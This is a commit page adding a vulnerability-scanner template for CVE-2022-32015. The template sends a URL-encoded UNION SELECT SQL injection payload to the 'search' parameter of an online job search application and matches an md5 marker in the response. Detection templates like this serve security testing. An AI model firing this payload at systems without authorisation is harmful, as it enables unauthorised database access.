Merge pull request #4848 from arafatansari/patch-10

Create CVE-2022-32015.yaml
patch-1
Prince Chaddha 2022-07-18 20:06:22 +05:30 committed by GitHub
commit 6223113073
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: CVE-2022-32015
info:
name: Complete Online Job Search System v1.0 - SQL Injection
author: arafatansari
severity: medium
description: |
Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=category&search=.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32015
metadata:
verified: true
tags: cve,cve2022,sqli,jobsearch
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'